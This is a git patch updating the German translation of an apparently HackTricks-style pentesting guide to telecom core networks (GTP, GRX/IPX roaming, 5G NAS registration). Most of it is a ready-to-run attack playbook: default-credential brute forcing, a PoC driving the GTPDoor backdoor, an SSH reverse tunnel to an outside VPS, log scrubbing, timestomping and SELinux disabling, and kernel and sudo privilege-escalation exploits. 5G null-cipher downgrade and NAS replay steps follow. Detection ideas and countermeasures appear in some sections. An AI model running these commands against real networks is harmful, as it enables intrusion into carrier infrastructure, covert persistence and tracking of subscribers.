From 40782bbc18bdc0f6f793c6c91b8dee646a1a02b1 Mon Sep 17 00:00:00 2001 From: Translator Date: Sun, 7 Sep 2025 20:10:39 +0000 Subject: [PATCH] Translated ['', 'src/generic-methodologies-and-resources/pentesting-netw --- .../telecom-network-exploitation.md | 203 +++++++++++++----- 1 file changed, 155 insertions(+), 48 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md index c554ff460..a2bb20cd0 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md +++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md @@ -1,27 +1,27 @@ -# Telecom-Netzwerkausnutzung (GTP / Roaming-Umgebungen) +# Telekommunikations-Netzwerk-Exploitation (GTP / Roaming Environments) {{#include ../../banners/hacktricks-training.md}} > [!NOTE] -> Mobile-Core-Protokolle (GPRS Tunneling Protocol – GTP) durchqueren oft semi-vertrauenswürdige GRX/IPX-Roaming-Backbones. Da sie über ungesichertes UDP ohne nahezu keine Authentifizierung laufen, **kann in der Regel jeder Zugang innerhalb eines Telekomperimeters direkt auf die Kernsignalisierungsebenen zugreifen**. Die folgenden Notizen sammeln offensive Tricks, die in der Wildnis gegen SGSN/GGSN, PGW/SGW und andere EPC-Knoten beobachtet wurden. +> Mobile-Core-Protokolle (GPRS Tunnelling Protocol – GTP) durchqueren oft halb-vertrauenswürdige GRX/IPX Roaming-Backbones. Da sie über unverschlüsseltes UDP mit nahezu keiner Authentifizierung laufen, **kann jeder foothold innerhalb eines Telekom-Perimeters normalerweise direkt die Kern-Signalisierungsebenen erreichen**. Die folgenden Notizen sammeln offensive Tricks, die in der Wildnis gegen SGSN/GGSN, PGW/SGW und andere EPC-Nodes beobachtet wurden. -## 1. Recon & Erster Zugriff +## 1. Recon & Initial Access -### 1.1 Standard-OSS / NE-Konten -Eine überraschend große Anzahl von Netzwerk-Elementen von Anbietern wird mit fest codierten SSH/Telnet-Benutzern wie `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … ausgeliefert. Eine dedizierte Wortliste erhöht den Erfolg bei Brute-Force-Angriffen erheblich: +### 1.1 Default OSS / NE Accounts +Eine überraschend große Anzahl von Hersteller-Netzwerkelementen wird mit fest kodierten SSH/Telnet-Benutzern ausgeliefert, wie `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Eine dedizierte wordlist erhöht die Brute-Force-Erfolgsrate dramatisch: ```bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt ``` -Wenn das Gerät nur eine Management-VRF bereitstellt, pivotieren Sie zuerst über einen Jump-Host (siehe Abschnitt «SGSN Emu Tunnel» unten). +Wenn das Gerät nur eine management VRF bereitstellt, zuerst über einen jump host pivoten (siehe Abschnitt «SGSN Emu Tunnel» weiter unten). -### 1.2 Host Discovery innerhalb von GRX/IPX -Die meisten GRX-Betreiber erlauben immer noch **ICMP Echo** über das Backbone. Kombinieren Sie `masscan` mit den integrierten `gtpv1` UDP-Proben, um GTP-C-Listener schnell zu kartieren: +### 1.2 Host-Erkennung innerhalb von GRX/IPX +Die meisten GRX-Operatoren erlauben immer noch **ICMP echo** über das Backbone. Kombiniere `masscan` mit den eingebauten `gtpv1` UDP-Probes, um schnell GTP-C-Listener zu kartieren: ```bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 ``` -## 2. Abfragen von Abonnenten – `cordscan` +## 2. Auflisten von Teilnehmern – `cordscan` -Das folgende Go-Tool erstellt **GTP-C Create PDP Context Request**-Pakete und protokolliert die Antworten. Jede Antwort zeigt den aktuellen **SGSN / MME** an, der die abgefragte IMSI bedient, und manchmal das besuchte PLMN des Abonnenten. +Das folgende Go-Tool erstellt **GTP-C Create PDP Context Request**-Pakete und protokolliert die Antworten. Jede Antwort offenbart die aktuelle **SGSN / MME**, die die abgefragte IMSI bedient, und manchmal das vom Teilnehmer besuchte PLMN. ```bash # Build GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan @@ -30,19 +30,19 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap ``` Wichtige Flags: -- `--imsi` Zielteilnehmer IMSI -- `--oper` Heimat / HNI (MCC+MNC) -- `-w` Rohpakete in pcap schreiben +- `--imsi` IMSI des Zielteilnehmers +- `--oper` Home / HNI (MCC+MNC) +- `-w` Schreibe rohe Pakete in pcap -Wichtige Konstanten im Binärformat können gepatcht werden, um Scans zu erweitern: +Wichtige Konstanten innerhalb des Binaries können gepatcht werden, um Scans auszuweiten: ``` pingtimeout = 3 // seconds before giving up pco = 0x218080 common_tcp_ports = "22,23,80,443,8080" ``` -## 3. Codeausführung über GTP – `GTPDoor` +## 3. Code-Ausführung über GTP – `GTPDoor` -`GTPDoor` ist ein kleiner ELF-Dienst, der **UDP 2123 bindet und jedes eingehende GTP-C-Paket analysiert**. Wenn die Nutzlast mit einem vorab geteilten Tag beginnt, wird der Rest entschlüsselt (AES-128-CBC) und über `/bin/sh -c` ausgeführt. Die stdout/stderr werden in **Echo Response**-Nachrichten exfiltriert, sodass keine ausgehende Sitzung jemals erstellt wird. +`GTPDoor` ist ein winziger ELF-Dienst, der **UDP 2123 bindet und jedes eingehende GTP-C-Paket parst**. Wenn die Nutzlast mit einem pre-shared tag beginnt, wird der Rest mit (AES-128-CBC) entschlüsselt und über `/bin/sh -c` ausgeführt. stdout/stderr werden in **Echo Response**-Nachrichten exfiltriert, sodass nie eine ausgehende Sitzung erstellt wird. Minimales PoC-Paket (Python): ```python @@ -52,40 +52,40 @@ cmd = b"id;uname -a" enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) ``` -Detection: -* Jeder Host, der **unausgeglichene Echo-Anfragen** an SGSN-IPs sendet -* GTP-Version-Flag auf 1 gesetzt, während der Nachrichtentyp = 1 (Echo) – Abweichung von der Spezifikation +Erkennung: +* jeder Host, der **unbalanced Echo Requests** an SGSN-IP-Adressen sendet +* GTP-Version-Flag auf 1 gesetzt, während message type = 1 (Echo) – Abweichung von der Spezifikation -## 4. Pivoting Through the Core +## 4. Pivoting durch das Core-Netz ### 4.1 `sgsnemu` + SOCKS5 -`OsmoGGSN` liefert einen SGSN-Emulator, der in der Lage ist, **einen PDP-Kontext zu einem echten GGSN/PGW** herzustellen. Sobald verhandelt, erhält Linux eine neue `tun0`-Schnittstelle, die vom roaming Peer erreichbar ist. +`OsmoGGSN` liefert einen SGSN-Emulator, der in der Lage ist, einen **PDP context zu einem echten GGSN/PGW aufzubauen**. Sobald ausgehandelt, erhält Linux ein neues `tun0`-Interface, das vom Roaming-Peer erreichbar ist. ```bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ -APN internet -c 1 -d ip route add 172.16.0.0/12 dev tun0 microsocks -p 1080 & # internal SOCKS proxy ``` -Mit ordnungsgemäßem Firewall-Hair-Pinning umgeht dieser Tunnel nur Signalisierungs-VLANs und landet Sie direkt im **Datenverkehr**. +Durch korrektes firewall hair-pinning umgeht dieser Tunnel signalling-only VLANs und führt dich direkt in die **data plane**. -### 4.2 SSH Reverse Tunnel über Port 53 -DNS ist in Roaming-Infrastrukturen fast immer offen. Exponieren Sie einen internen SSH-Dienst zu Ihrem VPS, der auf :53 lauscht, und kehren Sie später von zu Hause zurück: +### 4.2 SSH Reverse Tunnel over Port 53 +DNS ist in Roaming-Infrastrukturen fast immer offen. Exponiere einen internen SSH-Dienst auf deinem VPS, der auf :53 lauscht, und kehre später von zu Hause aus zurück: ```bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com ``` -Überprüfen Sie, ob `GatewayPorts yes` auf dem VPS aktiviert ist. +Prüfe, dass `GatewayPorts yes` auf dem VPS aktiviert ist. -## 5. Verdeckte Kanäle +## 5. Covert Channels -| Kanal | Transport | Dekodierung | Anmerkungen | -|-------|-----------|-------------|-------------| -| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-Byte Schlüssel + 14-Byte Chunks (XOR) | reiner passiver Listener, kein ausgehender Verkehr | -| DNS – `NoDepDNS` | UDP 53 | XOR (Schlüssel = `funnyAndHappy`) kodiert in A-Record-Oktetten | überwacht `*.nodep` Subdomain | -| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC Blob in privatem IE | vermischt sich mit legitimen GTP-C Gesprächen | +| Kanal | Transport | Decodierung | Hinweise | +|---------|-----------|----------|-------| +| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic | +| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | horcht auf `*.nodep` Subdomain | +| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | mischt sich unter legitimen GTP-Verkehr | -Alle Implantate implementieren Watchdogs, die ihre Binärdateien **timestomp** und sich neu starten, wenn sie abstürzen. +Alle implants implementieren watchdogs, die ihre Binärdateien **timestomp** und sich nach einem Absturz re-spawnen. -## 6. Verteidigungsumgehung Cheatsheet +## 6. Defense Evasion Cheatsheet ```bash # Remove attacker IPs from wtmp utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp @@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp setenforce 0 # disable SELinux ``` -## 7. Privilegienausweitung auf Legacy NE +## 7. Privilege Escalation auf Legacy NE ```bash # DirtyCow – CVE-2016-5195 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd @@ -111,30 +111,137 @@ python3 PwnKit.py # Sudo Baron Samedit – CVE-2021-3156 python3 exploit_userspec.py ``` -Reinigungstipp: +Bereinigungstipp: ```bash userdel firefart 2>/dev/null rm -f /tmp/sh ; history -c ``` -## 8. Werkzeugkasten +## 8. Tool Box -* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – benutzerdefinierte Werkzeuge, die in vorherigen Abschnitten beschrieben sind. -* `FScan` : Intranet TCP-Scans (`fscan -p 22,80,443 10.0.0.0/24`) -* `Responder` : LLMNR/NBT-NS bösartiger WPAD -* `Microsocks` + `ProxyChains` : leichtgewichtiges SOCKS5-Pivoting -* `FRP` (≥0.37) : NAT-Überwindung / Asset-Bridging +* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections. +* `FScan` : Intranet-TCP-Scans (`fscan -p 22,80,443 10.0.0.0/24`) +* `Responder` : LLMNR/NBT-NS rogue WPAD +* `Microsocks` + `ProxyChains` : leichtes SOCKS5 pivoting +* `FRP` (≥0.37) : NAT traversal / asset bridging + +## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay + +Die 5G-Registrierungsprozedur läuft über NAS (Non-Access Stratum) auf NGAP. Bis NAS-Security durch Security Mode Command/Complete aktiviert ist, sind Initialmeldungen weder authentifiziert noch verschlüsselt. Dieses Pre-Security-Fenster ermöglicht mehrere Angriffswege, wenn man N2-Traffic beobachten oder manipulieren kann (z. B. on-path im Core, rogue gNB oder Testbed). + +Registrierungsfluss (vereinfacht): +- Registration Request: UE sendet SUCI (verschlüsseltes SUPI) und capabilities. +- Authentication: AMF/AUSF senden RAND/AUTN; UE gibt RES* zurück. +- Security Mode Command/Complete: NAS-Integrity und Ciphering werden verhandelt und aktiviert. +- PDU Session Establishment: IP/QoS-Setup. + +Lab-Setup-Tipps (non-RF): +- Core: Open5GS Default-Deployment reicht aus, um die Flows zu reproduzieren. +- UE: Simulator oder Test-UE; Dekodierung mit Wireshark. +- Active tooling: 5GReplay (capture/modify/replay NAS innerhalb von NGAP), Sni5Gect (sniffen/patchen/injecten von NAS on-the-fly ohne kompletten rogue gNB hochzufahren). +- Nützliche Display-Filter in Wireshark: +- ngap.procedure_code == 15 (InitialUEMessage) +- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request) + +### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI +Erwartet: UE/USIM muss SUCI senden (SUPI verschlüsselt mit dem public key des Home-Networks). Das Finden eines Klartext-SUPI/IMSI in der Registration Request zeigt einen Datenschutzfehler, der persistentes Subscriber-Tracking ermöglicht. + +Wie testen: +- Capture die erste NAS-Nachricht in InitialUEMessage und inspiziere das Mobile Identity IE. +- Wireshark Quick-Checks: +- Es sollte als SUCI decodiert werden, nicht als IMSI. +- Filter-Beispiele: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` sollte vorhanden sein; Abwesenheit und gleichzeitige Präsenz von `imsi` weist auf ein leak hin. + +Was zu sammeln ist: +- MCC/MNC/MSIN, falls offengelegt; pro-UE protokollieren und über Zeit/Orte verfolgen. + +Gegenmaßnahmen: +- SUCI-only UEs/USIMs durchsetzen; Alarm bei jeglichem IMSI/SUPI in initialen NAS-Meldungen. + +### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0) +Hintergrund: +- UE gibt unterstützte EEA (Encryption) und EIA (Integrity) im UE Security Capability IE der Registration Request an. +- Gängige Zuordnungen: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 sind Null-Algorithmen. + +Problem: +- Da die Registration Request nicht integrity-geschützt ist, kann ein on-path Angreifer Capability-Bits löschen, um später während Security Mode Command die Auswahl von EEA0/EIA0 zu erzwingen. Manche Stacks erlauben fälschlicherweise Null-Algorithmen außerhalb von Emergency-Services. + +Offensive Schritte: +- InitialUEMessage abfangen und das NAS UE Security Capability so modifizieren, dass nur noch EEA0/EIA0 advertised werden. +- Mit Sni5Gect das NAS-Paket hooken und die Capability-Bits patchen, bevor weitergeleitet wird. +- Beobachten, ob das AMF Null-Cipher/Integrity akzeptiert und Security Mode mit EEA0/EIA0 abschließt. + +Verifikation/Sichtbarkeit: +- In Wireshark die ausgewählten Algorithmen nach Security Mode Command/Complete bestätigen. +- Beispielhafte passive Sniffer-Ausgabe: +``` +Encyrption in use [EEA0] +Integrity in use [EIA0, EIA1, EIA2] +SUPI (MCC+MNC+MSIN) 9997000000001 +``` +Gegenmaßnahmen (verpflichtend): +- Konfigurieren Sie AMF/policy so, dass EEA0/EIA0 abgelehnt werden, außer dort, wo es strikt vorgeschrieben ist (z. B. Notrufe). +- Bevorzugen Sie die Durchsetzung von mindestens EEA2/EIA2; protokollieren und alarmieren Sie bei jedem NAS-Sicherheitskontext, der Null-Algorithmen aushandelt. + +### 9.3 Replay der initial Registration Request (pre-security NAS) +Da initial NAS keine Integrität und Frische bietet, kann eine aufgezeichnete InitialUEMessage+Registration Request an das AMF wieder abgespielt werden. + +PoC-Regel für 5GReplay, um passende Replays weiterzuleiten: +```xml + + + + + + + + + + + +``` +Zu beobachten: +- Ob das AMF das Replay akzeptiert und mit der Authentifizierung fortfährt; fehlende Freshness-/Kontextvalidierung deutet auf Verwundbarkeit hin. + +Gegenmaßnahmen: +- Replay-Schutz/Kontextbindung am AMF erzwingen; pro-GNB/UE Ratenbegrenzung und Korrelation. + +### 9.4 Tooling-Hinweise (reproduzierbar) +- Open5GS: Starte ein AMF/SMF/UPF, um das Core zu emulieren; beobachte N2 (NGAP) und NAS. +- Wireshark: verifiziere Decodierungen von NGAP/NAS; wende die obigen Filter an, um Registration zu isolieren. +- 5GReplay: capture eine Registration, dann replaye spezifische NGAP- + NAS-Nachrichten gemäß der Regel. +- Sni5Gect: live sniff/modify/inject des NAS control-plane, um null-Algorithmen zu erzwingen oder Authentifizierungssequenzen zu stören. + +### 9.5 Defensive Checkliste +- Registration Request kontinuierlich auf plaintext SUPI/IMSI inspizieren; auffällige Geräte/USIMs blockieren. +- EEA0/EIA0 ablehnen, außer für eng definierte Notfallverfahren; mindestens EEA2/EIA2 verlangen. +- Rogue oder fehlkonfigurierte Infrastruktur erkennen: unauthorized gNB/AMF, unerwartete N2-Peers. +- Alarm bei NAS Security Modes, die zu null-Algorithmen führen oder häufige Replays von InitialUEMessage verursachen. --- -## Erkennungsideen -1. **Jedes Gerät außer einem SGSN/GGSN, das Create PDP Context Requests erstellt**. -2. **Nicht-standardisierte Ports (53, 80, 443), die SSH-Handshakes von internen IPs empfangen**. -3. **Häufige Echo-Anfragen ohne entsprechende Echo-Antworten** – könnte auf GTPDoor-Beacons hinweisen. -4. **Hohe Rate von ICMP-Echo-Antwortverkehr mit großen, nicht-null Identifikations-/Sequenzfeldern**. +## Erkennungs-Ideen +1. **Jedes Gerät außer einem SGSN/GGSN, das Create PDP Context Requests aufbaut**. +2. **Nicht-standardmäßige Ports (53, 80, 443), die SSH handshakes von internen IPs empfangen**. +3. **Häufige Echo Requests ohne entsprechende Echo Responses** – könnte auf GTPDoor beacons hinweisen. +4. **Hohe Rate von ICMP echo-reply Traffic mit großen, ungleich null identifier/sequence Feldern**. +5. 5G: **InitialUEMessage mit NAS Registration Requests, die wiederholt von identischen Endpunkten stammen** (Replay-Signal). +6. 5G: **NAS Security Mode, das EEA0/EIA0 aushandelt** außerhalb von Notfallkontexten. ## Referenzen -- [Palo Alto Unit42 – Infiltration von globalen Telekommunikationsnetzen](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) -- 3GPP TS 29.060 – GPRS Tunneling-Protokoll (v16.4.0) +- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) +- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) - 3GPP TS 29.281 – GTPv2-C (v17.6.0) +- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) +- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS +- 3GPP TS 33.501 – Security architecture and procedures for 5G System {{#include ../../banners/hacktricks-training.md}}